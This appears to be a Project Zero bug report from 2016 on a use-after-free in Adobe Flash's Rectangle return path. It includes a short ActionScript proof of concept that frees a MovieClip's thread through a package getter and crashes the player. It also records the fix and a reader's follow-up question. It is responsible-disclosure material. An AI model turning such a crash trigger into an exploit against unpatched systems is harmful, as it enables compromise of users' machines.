|
|
Adobe Flash: Use-after-free when returning Rectangle | |
| Project Member Reported by natashenka@google.com, Jun 9 2016 | Back to list | |
Several methods in flash return instances of the Rectangle class. There is a use-after-free in creating these objects for return. If the this object of the call is a MovieClip, the Rectangle instantiation will run on its thread. If a getter is added to this class's package, it will be invoked when fetching the rectangle constructor, which can free the method's thread, which will cause the Rectangle constructor to run on a thread which has been freed. A minimal PoC is at follows:
var mc = this.createEmptyMovieClip( "mc", 1);
mc.scrollRect = {x : 0, y : 0, height : 10, width : 10}
var r = flash.geom.Rectangle;
var g = flash.geom;
g.addProperty("Rectangle", func, func);
var f = ASnative(900, 405); //scrollRect
mc.f = f;
mc.f();
function func(){
mc.removeMovieClip();
// fix heap
return r;
}
A PoC and swf are attached. The PoC crashes in Chrome on 64-bit Windows.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
,
Aug 25 2016
Fixed in July update
,
Sep 8 2016
Hey Natalie, I had a quick question regarding the object being freed here. At the crash, the program is attempting to access a freed object, this is clear. But how were your able to confirm that this object is a thread object and not a MovieClip object in memory? I cannot seem to determine the object type from the vftable of the freed object. Perhaps there is some open source component in https://github.com/adobe-flash/avmplus that you can point me to? |
||
| ► Sign in to add a comment | ||
4.8 KB Download
826 bytes Download